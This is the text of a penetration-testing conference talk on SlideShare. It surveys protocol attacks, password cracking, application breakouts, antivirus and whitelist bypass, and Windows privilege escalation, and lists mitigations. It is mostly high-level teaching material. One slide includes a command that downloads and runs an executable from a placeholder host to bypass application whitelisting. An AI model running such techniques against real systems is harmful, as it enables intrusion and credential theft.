Scott Sutherland, profile picture
Uploaded byScott Sutherland
PPTX, PDF1,259 views

Secure360 - Attack All the Layers! Again!

The document presents a comprehensive overview of penetration testing, focusing on the rationale behind it, various attack vectors such as protocols, passwords, and applications, and techniques for bypassing endpoint protection and achieving privilege escalation. It discusses the implications of compliance requirements, risk evaluation, and preventive controls, while detailing common attacks and mitigation strategies associated with protocols like ARP, NBNS, SMB, and DTP. Additionally, it explores password cracking methods, common vulnerabilities in applications, and tactics for bypassing security measures, concluding that many networks and protocols have inherent vulnerabilities.

Embed presentation

Downloaded 51 times
INTRODUCTIONS Scott Sutherland  Principal Security Consultant @ NetSPI  Twitter: @_nullbind Karl Fosaaen  Senior Security Consultant @ NetSPI  Twitter: @kfosaaen We specialize in both things and stuff!
OVERVIEW • Why do companies pen test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
WHY DO COMPANIES PEN TEST? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
ATTACKING PROTOCOLS • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
ATTACKING PROTOCOLS: ARP Address Resolution Protocol
ATTACKING PROTOCOLS: ARP • General MAC to IP association Layer 2 • Conditions Independent of user action Broadcast network • Attacks MITM Monitoring MITM Injection DOS
ATTACKING PROTOCOLS: ARP
ATTACKING PROTOCOLS: ARP Common mitigating controls: • Dynamic ARP Inspection • Port Security • Static Routes (not recommended)
ATTACKING PROTOCOLS: NBNS / LLMNR NetBIOS Name Service
ATTACKING PROTOCOLS: NBNS • General  IP to hostname association  Layer 5 / 7 • Constraints  Dependent on user action  Broadcast Network  Windows Only • Attacks  MITM Monitoring  MITM Injection  DOS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS Common mitigating controls: • Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS • Disable NBNS • Disable insecure authentication methods to help limit impact of exposed hashes • Enable packet signing to help prevent SMB Relay attacks
ATTACKING PROTOCOLS: SMB Server Message Block
ATTACKING PROTOCOLS: SMB • General SMB is the come back kid! Layer 7 • Constraints Dependent on user action Any routable network No connecting back to originating host • Attacks Command execution Shells..aaand shells
ATTACKING PROTOCOLS: SMB
ATTACKING PROTOCOLS: SMB Historically SMB Relay has been used to: • Execute arbitrary commands • Obtain shells Lately the community has been developing tools for doing things like: • LDAP queries • SQL queries • Exchange services • Mounting file systems
ATTACKING PROTOCOLS: SMB Common mitigating controls: • Enable packet signing to help prevent SMB Relay attacks • Apply really old patches like if you missed out on the last decade…
ATTACKING PROTOCOLS: PXE Preboot eXecution Environment
ATTACKING PROTOCOLS: PXE • General DHCP • Attacks Rogue PXE server Command execution Access to unencrypted drive images Shells..aaand shells
ATTACKING PROTOCOLS: PXE Common mitigating controls: • MAC/IP filters • Limit PXE to specific networks • Network Access Controls - NAC
ATTACKING PROTOCOLS: DTP Dynamic Trunking Protocol
ATTACKING PROTOCOLS: DTP Common mitigating controls: • Use dedicated VLAN ID for all trunking ports • Disable all unused ports and place them on a non routable VLAN • Configure all user ports as access ports to prevent trunk negotiation • Configure frames with two 8021Q headers • Configure strong VACLs
ATTACKING PROTOCOLS: DTP • General  802.1Q encapsulation is in use  Layer 2 • Constraints  Independent of user action  Trunking is set to enabled or auto on switch port • Attacks  Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default  *Full VLAN hopping
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP Common mitigating controls: • Use dedicated VLAN ID for all trunking ports • Disable all unused ports and place them on a non routable VLAN • Configure all user ports as access ports to prevent trunk negotiation • Configure frames with two 8021Q headers • Configure strong VACLs
OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
ATTACKING PASSWORDS • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
ATTACKING PASSWORDS Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
ATTACKING PASSWORDS: DICTIONARY • Online Vs. Offline Attacks • Dictionary Attacks Enumerate users - Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc Attack! • Are users getting smarter? Sort of… - “Spring2014” meets password complexity requirements
ATTACKING PASSWORDS: HASHES • What are hashes? A non-reversible way of storing passwords Operating systems and applications Lots of types LM/NTLM  Network and Local  MD5  SHA  descrypt
ATTACKING PASSWORDS: HASHES • How do we get hashes? Cain and Abel fgdump Metasploit Mimikatz Databases Config files
ATTACKING PASSWORDS: CRACKING • Cracking Hashes Rainbow Tables John the Ripper oclHashcat CPU versus GPU
ATTACKING PASSWORDS: CRACKING 0 100 200 300 400 500 600 Minutes for Six Character Brute Force CPU GPU
ATTACKING PASSWORDS: CRACKINGGPUCPU
ATTACKING PASSWORDS: CLEARTEXT Common application configs Reversible Formats Find in files Groups.xml Unattend.xml Sysprep Registry WCE Mimikatz
OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
ATTACKING APPLICATIONS: COMMON • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
ATTACKING APPLICATIONS: BREAKOUTS • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
BYPASSING EPP: ANTI-VIRUS • Powershell Code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
BYPASSING EPP: APP WHITE LIST • Rename executables • Execution via approved apps - Powershell Code Injection - Rundll32 mydll,DLLMain@12 - IEExec http://x.x.x.x:8080/bypass.exe - cmd /c file.exe • Directory Exceptions • Disable Services • Poisoning updates and approved file lists
OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
WINDOWS ESCALATION: OVERVIEW • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
WINDOWS ESCALATION: GOALS Local Escalation Goals  Find clear text or reversible credentials with local administrative privileges  Get application to run commands as Administrator or LocalSystem Domain Escalation Goals  Find Domain Admins  Impersonate Domain Admins
WINDOWS ESCALATION: LOCAL Local Escalation  *Clear text credentials in files, registry, over network  Insecure service paths  DLL preloading  DLL and exe replacement  Binary planting in auto-run locations (reg and file system)  Modifying schedule tasks  *Local and remote exploits  Leverage local application like IIS, SQL Server etc  *UNC path injection + SMB Relay / Capture + crack
WINDOWS ESCALATION: DOMAIN Domain Escalation – Find DAs  Check locally! (Processes,Tokens, Cachedump)  Review active sessions - netsess  Review remote processes - tasklist  Service Principal Names (SPN) – get-spn  Scanning Remote Systems for NetBIOS Information - nbtscan  Pass the hash to other systems  PowerShell shell spraying  WINRM/WINRS shell spraying  Psexec shell spraying
WINDOWS ESCALATION: DOMAIN Domain Escalation – Impersonate DAs  Dump passwords from memory with Mimikatz  Migrate into the Domain Admin’s process  Steal Domain Admins delegation tokens with Incognito  Dump cached domain admin hashes with cachedump Relatively new techniques  PTH using Kerberos ticket
CONCLUSIONS All can kind of be fixed Most Networks Kind of broken Most Protocols Kind of broken Most Applications Kind of broken
ATTACK ALL THE LAYERS! ANY QUESTIONS?
ATTACK ALL THE LAYERS! Scott Sutherland Principal Security Consultant Twitter: @_nullbind Karl Fosaaen Senior Security Consultant Twitter: @kfosaaen

More Related Content

PDF
Attack all the layers secure 360
byScott Sutherland
 
PDF
Attack All the Layers: What's Working during Pentests (OWASP NYC)
byScott Sutherland
 
PDF
Attack All the Layers - What's Working in Penetration Testing
byNetSPI
 
PPTX
Secure360 - Extracting Password from Windows
byScott Sutherland
 
PDF
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
byScott Sutherland
 
PDF
Introduction to Windows Dictionary Attacks
byNetSPI
 
PDF
CNIT 123 Ch 10: Hacking Web Servers
bySam Bowne
 
PPTX
CableTap - Wirelessly Tapping Your Home Network
byChristopher Grayson
 
Attack all the layers secure 360
byScott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
byScott Sutherland
 
Attack All the Layers - What's Working in Penetration Testing
byNetSPI
 
Secure360 - Extracting Password from Windows
byScott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
byScott Sutherland
 
Introduction to Windows Dictionary Attacks
byNetSPI
 
CNIT 123 Ch 10: Hacking Web Servers
bySam Bowne
 
CableTap - Wirelessly Tapping Your Home Network
byChristopher Grayson
 

What's hot

PDF
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
byGabriella Davis
 
PPTX
Sticky Keys to the Kingdom
byDennis Maldonado
 
PPTX
You, and Me, and Docker Makes Three
byChristopher Grayson
 
PDF
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
byPriyanka Aash
 
PPTX
Outlook and Exchange for the bad guys
byNick Landers
 
PDF
Lateral Movement: How attackers quietly traverse your Network
byEC-Council
 
PDF
Fun With SHA2 Certificates
byGabriella Davis
 
PDF
CNIT 152 10 Enterprise Service
bySam Bowne
 
PPTX
Cloudstone - Sharpening Your Weapons Through Big Data
byChristopher Grayson
 
PPTX
External to DA, the OS X Way
byStephan Borosh
 
PDF
Derbycon - The Unintended Risks of Trusting Active Directory
byWill Schroeder
 
PDF
Common technique in Bypassing Stuff in Python.
byShahriman .
 
PDF
CNIT 123 Ch 8: OS Vulnerabilities
bySam Bowne
 
PPTX
Lateral Movement - Phreaknik 2016
byXavier Ashe
 
PPTX
Powering up on power shell avengercon - 2018
byFernando Tomlinson, CISSP, MBA
 
PDF
Security events in 2014
byChong-Kuan Chen
 
PPTX
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
byBlueHat Security Conference
 
PPTX
An Introduction to PowerShell for Security Assessments
byEnclaveSecurity
 
PPTX
Pwning the Enterprise With PowerShell
byBeau Bullock
 
PDF
A Byte of Software Deployment
byGong Haibing
 
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
byGabriella Davis
 
Sticky Keys to the Kingdom
byDennis Maldonado
 
You, and Me, and Docker Makes Three
byChristopher Grayson
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
byPriyanka Aash
 
Outlook and Exchange for the bad guys
byNick Landers
 
Lateral Movement: How attackers quietly traverse your Network
byEC-Council
 
Fun With SHA2 Certificates
byGabriella Davis
 
CNIT 152 10 Enterprise Service
bySam Bowne
 
Cloudstone - Sharpening Your Weapons Through Big Data
byChristopher Grayson
 
External to DA, the OS X Way
byStephan Borosh
 
Derbycon - The Unintended Risks of Trusting Active Directory
byWill Schroeder
 
Common technique in Bypassing Stuff in Python.
byShahriman .
 
CNIT 123 Ch 8: OS Vulnerabilities
bySam Bowne
 
Lateral Movement - Phreaknik 2016
byXavier Ashe
 
Powering up on power shell avengercon - 2018
byFernando Tomlinson, CISSP, MBA
 
Security events in 2014
byChong-Kuan Chen
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
byBlueHat Security Conference
 
An Introduction to PowerShell for Security Assessments
byEnclaveSecurity
 
Pwning the Enterprise With PowerShell
byBeau Bullock
 
A Byte of Software Deployment
byGong Haibing
 

Viewers also liked

PDF
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
byScott Sutherland
 
PDF
WTF is Penetration Testing
byScott Sutherland
 
PDF
Declaration of malWARe
byScott Sutherland
 
PPTX
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
PPTX
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
byScott Sutherland
 
PDF
Introduction to Windows Dictionary Attacks
byScott Sutherland
 
PDF
Thick Application Penetration Testing: Crash Course
byScott Sutherland
 
PPTX
WTF is Penetration Testing v.2
byScott Sutherland
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
byScott Sutherland
 
WTF is Penetration Testing
byScott Sutherland
 
Declaration of malWARe
byScott Sutherland
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
byScott Sutherland
 
Introduction to Windows Dictionary Attacks
byScott Sutherland
 
Thick Application Penetration Testing: Crash Course
byScott Sutherland
 
WTF is Penetration Testing v.2
byScott Sutherland
 

Similar to Secure360 - Attack All the Layers! Again!

PDF
Attack All The Layers - What's Working in Penetration Testing
byNetSPI
 
PPTX
BSIDES-PR Keynote Hunting for Bad Guys
byJoff Thyer
 
PPTX
Penetration Testing and Intrusion Detection System
byBikrant Gautam
 
PDF
CNIT 123: 8: Desktop and Server OS Vulnerabilites
bySam Bowne
 
PDF
Ch 8: Desktop and Server OS Vulnerabilites
bySam Bowne
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
PDF
CNIT 123 8: Desktop and Server OS Vulnerabilities
bySam Bowne
 
PPT
Network security
byAkhilesh Jain
 
PPT
Network Security Attacks, and Solutions.
bygregtap1
 
PPT
Network Security. Different aspects of Network Security.
bygregtap1
 
PPT
Network security
byMD. IFTEKARUL ALAM
 
PPT
Intro To Hacking
bynayakslideshare
 
PDF
Real life hacking101
byFlorent Batard
 
PPTX
Kali Linux Pen Testing Penguicon 2019_Intro To Pen Testing and Kali Linux
byHabibAhmadPurba2
 
PPTX
Hunt for the red DA
byNeil Lines
 
PPTX
DC612 Day - Hands on Penetration Testing 101
bydc612
 
PDF
The Art of Grey-Box Attack
byPrathan Phongthiproek
 
PPT
Introduction To Information Security
bybelsis
 
PPTX
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
byEric Vanderburg
 
PDF
ethical Hack
byViggi Unbeaten
 
Attack All The Layers - What's Working in Penetration Testing
byNetSPI
 
BSIDES-PR Keynote Hunting for Bad Guys
byJoff Thyer
 
Penetration Testing and Intrusion Detection System
byBikrant Gautam
 
CNIT 123: 8: Desktop and Server OS Vulnerabilites
bySam Bowne
 
Ch 8: Desktop and Server OS Vulnerabilites
bySam Bowne
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
CNIT 123 8: Desktop and Server OS Vulnerabilities
bySam Bowne
 
Network security
byAkhilesh Jain
 
Network Security Attacks, and Solutions.
bygregtap1
 
Network Security. Different aspects of Network Security.
bygregtap1
 
Network security
byMD. IFTEKARUL ALAM
 
Intro To Hacking
bynayakslideshare
 
Real life hacking101
byFlorent Batard
 
Kali Linux Pen Testing Penguicon 2019_Intro To Pen Testing and Kali Linux
byHabibAhmadPurba2
 
Hunt for the red DA
byNeil Lines
 
DC612 Day - Hands on Penetration Testing 101
bydc612
 
The Art of Grey-Box Attack
byPrathan Phongthiproek
 
Introduction To Information Security
bybelsis
 
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
byEric Vanderburg
 
ethical Hack
byViggi Unbeaten
 

More from Scott Sutherland

PPTX
Hunting SMB Shares with Data, Graphs, Charts, and LLMs (SO-CON 2025)
byScott Sutherland
 
PPTX
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
byScott Sutherland
 
PPTX
How to Build and Validate Ransomware Attack Detections (Secure360)
byScott Sutherland
 
PDF
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
byScott Sutherland
 
PPTX
2019 Blackhat Booth Presentation - PowerUpSQL
byScott Sutherland
 
PDF
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
byScott Sutherland
 
PPTX
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
byScott Sutherland
 
PPTX
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
byScott Sutherland
 
PPTX
Beyond xp_cmdshell: Owning the Empire through SQL Server
byScott Sutherland
 
PPTX
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
PPTX
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
byScott Sutherland
 
PPTX
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
PPTX
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
byScott Sutherland
 
Hunting SMB Shares with Data, Graphs, Charts, and LLMs (SO-CON 2025)
byScott Sutherland
 
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
byScott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
byScott Sutherland
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
byScott Sutherland
 
2019 Blackhat Booth Presentation - PowerUpSQL
byScott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
byScott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
byScott Sutherland
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
byScott Sutherland
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
byScott Sutherland
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
byScott Sutherland
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
byScott Sutherland
 

Recently uploaded

PDF
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
PDF
Title Installing Windows, Linux, MacOS.pdf
byGeraldAbadajos
 
PDF
OpenCharacter AI Reviews: Features, Plans, and Best Alternative
byOpenCharacter AI
 
PDF
Certified AI-Empowered SAFe 6 Scrum Master.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
PDF
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
PDF
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
PPTX
TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony
bysuhasspgdg
 
PDF
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
PDF
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
PDF
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
PDF
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
PDF
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
PDF
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
PPTX
INSY_7213_Theme Sessions 47 & 48 Advanced databases.pptx
bystormzy56
 
PDF
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
PDF
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
PDF
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
PDF
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
PDF
AI and Zero Trust: What it takes to do it right
byMark Simos
 
PDF
How to Design Premium Health (Public Health) PPT Using AI? Top Strategies
byPublic Health Concern Nepal
 
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
Title Installing Windows, Linux, MacOS.pdf
byGeraldAbadajos
 
OpenCharacter AI Reviews: Features, Plans, and Best Alternative
byOpenCharacter AI
 
Certified AI-Empowered SAFe 6 Scrum Master.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony
bysuhasspgdg
 
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
Transcript: EU regulations for the North American book supply chain - Tech Fo...
byBookNet Canada
 
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
INSY_7213_Theme Sessions 47 & 48 Advanced databases.pptx
bystormzy56
 
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
AI and Zero Trust: What it takes to do it right
byMark Simos
 
How to Design Premium Health (Public Health) PPT Using AI? Top Strategies
byPublic Health Concern Nepal
 

Secure360 - Attack All the Layers! Again!

  • 2.
    INTRODUCTIONS Scott Sutherland  PrincipalSecurity Consultant @ NetSPI  Twitter: @_nullbind Karl Fosaaen  Senior Security Consultant @ NetSPI  Twitter: @kfosaaen We specialize in both things and stuff!
  • 3.
    OVERVIEW • Why docompanies pen test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
  • 4.
    WHY DO COMPANIESPEN TEST? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
  • 5.
    OVERVIEW • Attacking Protocols •Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 6.
    ATTACKING PROTOCOLS • ARP:Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
  • 7.
  • 8.
    ATTACKING PROTOCOLS: ARP •General MAC to IP association Layer 2 • Conditions Independent of user action Broadcast network • Attacks MITM Monitoring MITM Injection DOS
  • 9.
  • 10.
    ATTACKING PROTOCOLS: ARP Commonmitigating controls: • Dynamic ARP Inspection • Port Security • Static Routes (not recommended)
  • 11.
    ATTACKING PROTOCOLS: NBNS/ LLMNR NetBIOS Name Service
  • 12.
    ATTACKING PROTOCOLS: NBNS •General  IP to hostname association  Layer 5 / 7 • Constraints  Dependent on user action  Broadcast Network  Windows Only • Attacks  MITM Monitoring  MITM Injection  DOS
  • 13.
  • 14.
  • 15.
  • 16.
    ATTACKING PROTOCOLS: NBNS Commonmitigating controls: • Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS • Disable NBNS • Disable insecure authentication methods to help limit impact of exposed hashes • Enable packet signing to help prevent SMB Relay attacks
  • 17.
  • 18.
    ATTACKING PROTOCOLS: SMB •General SMB is the come back kid! Layer 7 • Constraints Dependent on user action Any routable network No connecting back to originating host • Attacks Command execution Shells..aaand shells
  • 19.
  • 20.
    ATTACKING PROTOCOLS: SMB HistoricallySMB Relay has been used to: • Execute arbitrary commands • Obtain shells Lately the community has been developing tools for doing things like: • LDAP queries • SQL queries • Exchange services • Mounting file systems
  • 21.
    ATTACKING PROTOCOLS: SMB Commonmitigating controls: • Enable packet signing to help prevent SMB Relay attacks • Apply really old patches like if you missed out on the last decade…
  • 22.
  • 23.
    ATTACKING PROTOCOLS: PXE •General DHCP • Attacks Rogue PXE server Command execution Access to unencrypted drive images Shells..aaand shells
  • 24.
    ATTACKING PROTOCOLS: PXE Commonmitigating controls: • MAC/IP filters • Limit PXE to specific networks • Network Access Controls - NAC
  • 25.
  • 26.
    ATTACKING PROTOCOLS: DTP Commonmitigating controls: • Use dedicated VLAN ID for all trunking ports • Disable all unused ports and place them on a non routable VLAN • Configure all user ports as access ports to prevent trunk negotiation • Configure frames with two 8021Q headers • Configure strong VACLs
  • 27.
    ATTACKING PROTOCOLS: DTP •General  802.1Q encapsulation is in use  Layer 2 • Constraints  Independent of user action  Trunking is set to enabled or auto on switch port • Attacks  Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default  *Full VLAN hopping
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
    ATTACKING PROTOCOLS: DTP Commonmitigating controls: • Use dedicated VLAN ID for all trunking ports • Disable all unused ports and place them on a non routable VLAN • Configure all user ports as access ports to prevent trunk negotiation • Configure frames with two 8021Q headers • Configure strong VACLs
  • 33.
    OVERVIEW • Attacking Protocols •Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 34.
    ATTACKING PASSWORDS • Hashesand Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
  • 35.
    ATTACKING PASSWORDS Tool FunctionYear Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
  • 36.
    ATTACKING PASSWORDS: DICTIONARY •Online Vs. Offline Attacks • Dictionary Attacks Enumerate users - Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc Attack! • Are users getting smarter? Sort of… - “Spring2014” meets password complexity requirements
  • 37.
    ATTACKING PASSWORDS: HASHES •What are hashes? A non-reversible way of storing passwords Operating systems and applications Lots of types LM/NTLM  Network and Local  MD5  SHA  descrypt
  • 38.
    ATTACKING PASSWORDS: HASHES •How do we get hashes? Cain and Abel fgdump Metasploit Mimikatz Databases Config files
  • 39.
    ATTACKING PASSWORDS: CRACKING •Cracking Hashes Rainbow Tables John the Ripper oclHashcat CPU versus GPU
  • 40.
  • 41.
  • 42.
    ATTACKING PASSWORDS: CLEARTEXT Commonapplication configs Reversible Formats Find in files Groups.xml Unattend.xml Sysprep Registry WCE Mimikatz
  • 43.
    OVERVIEW • Attacking Protocols •Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 44.
    ATTACKING APPLICATIONS: COMMON •Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
  • 45.
    ATTACKING APPLICATIONS: BREAKOUTS •Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
  • 46.
    OVERVIEW • Attacking Protocols •Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 47.
    BYPASSING EPP: ANTI-VIRUS •Powershell Code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
  • 48.
    BYPASSING EPP: APPWHITE LIST • Rename executables • Execution via approved apps - Powershell Code Injection - Rundll32 mydll,DLLMain@12 - IEExec http://x.x.x.x:8080/bypass.exe - cmd /c file.exe • Directory Exceptions • Disable Services • Poisoning updates and approved file lists
  • 49.
    OVERVIEW • Attacking Protocols •Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 50.
    WINDOWS ESCALATION: OVERVIEW •Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
  • 51.
    WINDOWS ESCALATION: GOALS LocalEscalation Goals  Find clear text or reversible credentials with local administrative privileges  Get application to run commands as Administrator or LocalSystem Domain Escalation Goals  Find Domain Admins  Impersonate Domain Admins
  • 52.
    WINDOWS ESCALATION: LOCAL LocalEscalation  *Clear text credentials in files, registry, over network  Insecure service paths  DLL preloading  DLL and exe replacement  Binary planting in auto-run locations (reg and file system)  Modifying schedule tasks  *Local and remote exploits  Leverage local application like IIS, SQL Server etc  *UNC path injection + SMB Relay / Capture + crack
  • 53.
    WINDOWS ESCALATION: DOMAIN DomainEscalation – Find DAs  Check locally! (Processes,Tokens, Cachedump)  Review active sessions - netsess  Review remote processes - tasklist  Service Principal Names (SPN) – get-spn  Scanning Remote Systems for NetBIOS Information - nbtscan  Pass the hash to other systems  PowerShell shell spraying  WINRM/WINRS shell spraying  Psexec shell spraying
  • 54.
    WINDOWS ESCALATION: DOMAIN DomainEscalation – Impersonate DAs  Dump passwords from memory with Mimikatz  Migrate into the Domain Admin’s process  Steal Domain Admins delegation tokens with Incognito  Dump cached domain admin hashes with cachedump Relatively new techniques  PTH using Kerberos ticket
  • 56.
    CONCLUSIONS All can kindof be fixed Most Networks Kind of broken Most Protocols Kind of broken Most Applications Kind of broken
  • 57.
    ATTACK ALL THELAYERS! ANY QUESTIONS?
  • 58.
    ATTACK ALL THELAYERS! Scott Sutherland Principal Security Consultant Twitter: @_nullbind Karl Fosaaen Senior Security Consultant Twitter: @kfosaaen

Editor's Notes

  • #5 Validation controls = ids/ips/waf incident response
